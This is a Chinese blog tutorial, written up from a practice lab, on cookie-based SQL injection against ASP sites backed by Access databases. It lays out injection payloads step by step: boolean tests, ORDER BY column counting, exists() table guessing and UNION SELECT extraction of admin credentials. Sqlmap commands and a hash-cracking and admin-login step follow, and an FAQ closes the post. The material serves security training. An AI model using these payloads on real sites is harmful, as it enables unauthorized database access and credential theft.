Accsess注入

已于 2022-06-01 19:14:11 修改
阅读量634 收藏
点赞数
分类专栏: Access注入 文章标签: 数据库 php web安全
于 2022-06-01 00:39:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36232967/article/details/125076138
版权

🛑郑重声明

此文章仅供学习交流与参考使用,禁止运用于任何非法行动或测试中,若有预期之外的后果,将不承担任何责任!!

Cookie注入

Cookie注入简介

开发人员用REQUEST进行获取参数,当Cookie里面具有相同的键值时,如果传参无该键,将会从Cookie中获取。后台校验又没有对Cookie进行校验,所以会产生Cookie注入。

Cookie注入在ASP网站中和低版本php中才会有,ASP常用的数据库是Accsess。Accsess数据库又比较特殊,所以这边用Accsess讲解。

为什么可以cookie注入

因为在这里接受参数的时候使用了REQUEST,他可以接受get 和POST 和 COOKIE的传参

cookie注入满足条件

网站会获取Cookie传参然后和原有的SQL语句拼接再传入数据库

Cookie注入常见吗?

老一点的ASP网站常见,PHP看版本,因为高于5.4以上的php版本他的$_REQUEST将不再接受cookie传参

怎么修改Cookie

  1. Burp抓取数据包直接修改数据包的值,添加一个Cookie字段在请求头里面
  2. 使用浏览器插件修改Cookie
  3. 使用JS修改Cookie document.cookie=”id=” + escape(“171”) escape是一个编码函数,这个函数会进行一次URL编码

注意点:Cookie传参值需要URL编码,大家记得传参的值URL编码下

在线URL编码地址:UrlEncode编码/UrlDecode解码 - 站长工具

Cookie注入靶场讲解

最简单的联合查询获取表名字段名不能用,因为是Access数据库,我们没有系统自带表,而且Access数据库只有一个数据库,不用纠结库名。那么怎么获取Access数据库的表名和字段名,方法只有爆破,and exists (select*from 表名) 如果页面正常,就是存在这个表
exists 这个函数就是检查子查询能否查询到数据,如果能会返回一个True

SQLmap如何跑Cookie注入 sqlmap.py -u “http://59.63.200.79:8004/shownews.asp“ —cookie “id=171” —level 2

确认注入类型和注入点

去处GET传参,修改为Cookie:id=172 AND 1=1,发现页面展示正常,修改为Cookie:id=172 AND 1=2,发现页面展示不正常,确认为Cookie注入


不正常页面

确认字段个数

去处GET传参,修改为Cookie:id=172 ORDER BY 10,发现页面展示正常,修改为Cookie:id=172 ORDER BY 11,发现页面展示不正常,确认展示字段个数为10个


不正常页面

猜测表名称

因为是Access数据库,我们没有系统自带表,而且Access数据库只有一个数据库,不用纠结库名。那么怎么获取Access数据库的表名和字段名,方法只有爆破。and exists (selectfrom 表名) 如果页面正常,就是存在这个表
去处GET传参,修改为Cookie:id=172 and exists (selectfrom admin) ,发现页面展示正常,说明存在admin表

猜测字段名称

修改为Cookie:id=172 and exists (select username from admin) ,发现页面展示正常,说明admin表存在username字段

修改为Cookie:id=172 and exists (select password from admin) ,发现页面展示正常,说明admin表存在password 字段

确认字段展示位置

修改为Cookie:id=172 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10 FROM admin ,根据结果可以知道 2和3均可以作为输出点

查询我们需要的数据

修改为Cookie:id=172 and 1=2 UNION SELECT 1,username,password,4,5,6,7,8,9,10 FROM admin

密码:b9a2a2b5dffb918c这是密文,通过在线网站解密
http://cmd5.com
http://somd5.com

账号:admin

密码:welcome

登录后台获取通关口令

http://59.63.200.79:8004/admin/Login.asp


zkz{welcome-control}

Cookie注入常见问题

  1. Cookie注入常见吗?

    老一点的ASP网站常见,PHP看版本,因为高于5.4以上的php版本他的$_REQUEST将不再接受cookie传参

  2. COOKIE注入时为什么要删除URL内的id传参

    因为它传参进去会有一个输出,cookie里我们也传参了一个id数值,他会优先接受GET的传参,具体也是要看语言的,我测试过,PHP会优先接受Cookie传参

  3. 为什么可以cookie注入

    因为在这里接受参数的时候使用了REQUEST,他可以接受get 和POST 和 COOKIE的传参

  4. 为什么没用到information_schema

    access数据库里没有系统自带表,只能猜

  5. 不能查information_schema怎么得知表名

    可以靠爆破和尝试一些常用表名(例如:news、admin、user)

  6. 为什么cookie注入里查找回显点语句后要加上from admin

    因为access数据库不支持select 1,2,3 这样的语句,他必须要跟表名

  7. 为什么cookie注入语句后面不用加注释

    这个和SQL语句的组成部分有关,你注入的地方语句如果是
    Select*from news where id=1 然后注入点在id=这里自然可以不加注释

  8. 为什么cookie注入可以绕过验证

    因为早期网站防护只检测GET和POST传参,没有检测COOKIE

  9. sqlmap如何进行cookie注入

    Sqlmap可以提高检测等级来进行cookie注入(检测等级3及以上,要指定参数)
    还可以抓包,在Cookie后面打个*就可以了

  10. 在无法查询系统自带库的时候如何获取表名

    可以burp抓包爆破查询表名,因为表名的命名一般都有规则
    and exist(select * from xxx)

  11. cookie注入和显错注入,盲注这些有什么不同

    我们课堂演示的Cookie注入属于显错注入,凡事都是讲究对应,例如大对小 胖对瘦 高对矮。Cookie注入的核心是传参方式,他对应的应该是POST注入之类的。显错注入的分类很明显核心看是否是显错,那么对应的就是盲注或者报错注入之类的。

  12. 什么是cookie

    一种储存在用户本地上的数据,指某些网站为了辨别用户身份、进行 session 跟踪而储存在用户本地终端上的数据(通常经过加密)

  13. 如何去修改cookie

    • 可以抓包修改(burp)
    • 可以在浏览器里打开f12控制台通过JS修改,还可以在存储里修改cookie
    • 可以使用插件修改(modify headers)

  14. Cookie注入中可以用盲注的方式去判断表名吗

    可以呀,不过能用显错就用显错,这里即使是用盲注还是得暴力猜解表名

  15. Cookie注入只能在Access数据库上面使用吗?

    并不是呀,基本上所有数据库都能呀,Cookie注入核心是传参方式,传参方式和数据库类型没有关系呀,是动态脚本语言干的事,这个锅数据库他不背。

  16. Cookie注入仅仅在ASP站点有吗?

    Cookie注入在PHP中也有,但是最多得还是ASP,因为PHP在5.4的版本$_REQUEST就不会再接受Cookie传参了。

  17. 为什么我写的语句放入Cookie无效,SQL注入无效

    因为Cookie需要进行一次URL编码才会有效果

  18. 为什么我谷歌直接修改Cookie没有效果

    建议使用火狐浏览器,不要使用谷歌

  19. 如果用Sqlmap直接跑Cookie注入

    sqlmap.py -u “http://59.63.200.79:8004/shownews.asp“ —cookie “id=171” —level 2

qq_36232967
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
计算机accsess知识点,2016计算机二级《Access》知识点
weixin_33055757的博客
06-27 1532
2016计算机二级《Access》知识点★数据类型一个表中的同一列数据应具有相同的数据特征,称为字段的数据类型。数据类型决定了数据存储方式和使用方式。Access2010提供了12种数据类型,包括文本、备注、数字、日期/时间、货币、自动编号、是/否、OLE对象、超链接、附件、计算和查阅向导等。★文本文本类型可存储字符或数字。文本型字段最多可存储255个字符,当超过255个字符时应选择备注类型。★备...
毕业设计 购物系统
06-02
8. **安全性**:考虑到网上交易的安全性,系统需要防止SQL注入、XSS攻击等常见网络安全问题,同时保证数据传输过程中的加密。 9. **性能优化**:对于高并发场景,需要考虑页面缓存、数据库查询优化等策略,以提升...
accsess2003简体中文绿色版
05-06
Microsoft Office Access(前名 Microsoft Access)是由微软发布的关联式数据库管理系统。它结合了 Microsoft Jet Database Engine 和 图形用户界面两项特点,是 Microsoft Office的成员之一。 Access能够存取 Access/Jet、Microsoft SQL Server、Oracle,或者任何 ODBC 兼容数据库内的资料。熟练的软件设计师和资料分析师利用它来开发应用软件,而一些不熟练的程序员和非程序员的"进阶用户"则能使用它来开发简单的应用软件。虽然它支援部份面向对象(OO)技术,但是未能成为一种完整的面向对象开发工具。 其实Access 也是微软公司另一个通讯程序的名字,想与 ProComm 以及其他类似程序来竞争。可是事后微软证实这是个失败计划,并且将它中止。数年后他们把名字重新命名于数据库软件。 单独的ACCESS我之前也在网上找了很久都没找到,这次无意间看到了,但感觉有点大怕服务器吃不消,又看到有很多人需要所以就放上来给大家分享,希望大家喜欢! 使用方法:解压后,运行RegAccess2003.exe即可。
C#读写Accsess示例一
weixin_30883311的博客
05-31 202
连接Accsess数据库 >> 函数代码 OleDbConnection conn = null; //连接数据库字符串,更改为全局变量 public OleDbConnection GetConnection() // 1、创建数据库连接 { string str = "Provid...
accsees数据库下载导入
qq_45300786的博客
05-14 400
数据库文件后缀改成rar 访问下载 下载好后,改回accsess数据库的格式(mdb)导入数据库,查看数据 下载的时候记得改成rar,不然可能要出错
vba读取服务器accsess文件,VBA获取文件的图标并显示在窗体或按钮上的源码
weixin_29040367的博客
08-12 414
'模块中的代码Option ExplicitPublic Const SHGFI_DISPLAYNAME = &H200Public Const SHGFI_EXETYPE = &H2000Public Const SHGFI_LARGEICON = &H0Public Const SHGFI_SHELLICONSIZE = &H4Public Const SHGF...
客户管理系统
12-04
【客户管理系统】是一种用于企业管理和维护客户关系的重要工具,它集成了销售、市场和服务等多个业务领域,旨在提高客户满意度和企业效率。在这个系统中,"asp+access"的开发组合是一种常见的技术选择。...
access.rar
03-24
在IT行业中,三层架构是一种常见的软件设计模式,它将应用程序分为三个主要部分:表现层(Presentation Layer)、业务逻辑层(Business Logic Layer)和数据访问层(Data Access Layer)。本示例中的"access.rar...
pc access smart 博图通讯设置说明.pdf
10-30
### PC ACCESS SMART 与博图V15.1 OPC通讯设置详解 #### 一、引言 在工业自动化领域,不同设备之间的数据交换至关重要。PC ACCESS SMART作为一种强大的工具,能够帮助用户实现与西门子TIA Portal博图V15.1等软件...
ACCESS2003绿色版
10-23
这是单独的ACCESS2003版本,纯绿色,完美版本。以后需要使用ACCESS,不需要下载整个Office了,我一直在用。 Microsoft Office Access(前名 Microsoft Access)是由微软发布的关联式数据库管理系统。它结合了 Microsoft Jet Database Engine 和 图形用户界面两项特点,是 Microsoft Office的成员之一。 Access能够存取 Access/Jet、Microsoft SQL Server、Oracle,或者任何 ODBC 兼容数据库内的资料。熟练的软件设计师和资料分析师利用它来开发应用软件,而一些不熟练的程序员和非程序员的"进阶用户"则能使用它来开发简单的应用软件。虽然它支援部份面向对象(OO)技术,但是未能成为一种完整的面向对象开发工具。 其实Access 也是微软公司另一个通讯程序的名字,想与 ProComm 以及其他类似程序来竞争。可是事后微软证实这是个失败计划,并且将它中止。数年后他们把名字重新命名于数据库软件。 解压密码:www.asp163.org 使用方法 解压后运行RegAccess2003.exe即可 注意:RegAccess2003.exe有杀毒软件误报,请放心使用。如果不放心,请直接使用Access2003.exe。
ACCESS大批量数据写入之性能提升方案
韩小明@xiammy的专栏
09-11 6795
ACCESS数据库中批量写入大数据量时,最让人头疼的就是效率问题了。我一直也被这个问题困扰着。最近突然想起一个方案。利用ACCESS自身的导入功能,实现大数据的迅速导入功能。整体方案是这样的:数据—>文本文件—>MDB 适用范围:大批量数据转换 下面是实现方案,请注意后面的注释。第一、将 数据写入到文本文件中。每一行一条记录,第一行是标题行。这里注意文本文件的格式:列之间使用逗号分
C++中的_access函数
热门推荐
516843761
01-26 3万+
今天读代码看到一个access函数,当时没明白怎么回事。man了一下才知道该函数主要用于文件读取方面——判断文件是否存在,并判断文件是否可写。Linux下,该函数为access,位于头文件中,而在标准C++中,该函数为_access,位于头文件中,两者的使用方法基本相同,只是在一些参数方面可能会有一些不同的宏定义。下面是标准C++为例做一下总结: 头文件: 函数原型:int _access(c
vba读取服务器accsess文件,vba 服务器 access数据库
weixin_35457696的博客
08-11 702
vba 服务器 access数据库 内容精选换一换创建外部服务器,用于定义OBS服务器的信息,供外表调用。创建外部服务器的详细语法,请参见CREATE SERVER。如果您将使用普通用户在自定义数据库中创建外部服务器和外表,由于普通用户没有外表权限无法创建,所以,您必须参照以下步骤新建用户和数据库,并授予该用户外表权限。以下示例,是新建一个普通用户dbuser并创建一个数据库mydataPostg...
cookie的中文乱码问题【URL编码解码】
weixin_34240520的博客
03-07 1495
先搞明白为什么会乱码,为什么要转码: 在tomcat 8 之前,cookie中不能直接存储中文数据。需要将中文数据转码,一般采用URL编码(%E3)。在tomcat 8 之后,cookie支持中文数据。特殊字符还是不支持(比如空格),建议使用URL编码存储,URL解码解析。 编码解码前后字符如下表所示: 编码前 十进制数字、汉字 编码后 十六进制数字...
Access注入——Cookie注入,偏移注入
weixin_46601374的博客
02-26 1226
Cookie注入简介 什么是Cookie? Cookie就是代表你身份的一串字符串,网站根据Cookie来识别你是谁,如果你获取了管理员的Cookie,你可以无需密码直接登陆管理员账号
获得微信小程序登录后的accsess_token
最新发布
06-06
要获得微信小程序登录后的 access_token,可以使用微信提供的登录凭证校验接口。以下是大致的步骤: 1. 在小程序中调用 wx.login() 方法,获取 code。 2. 在后端服务器中使用 code 调用微信提供的登录凭证校验接口...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

qq_36232967

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值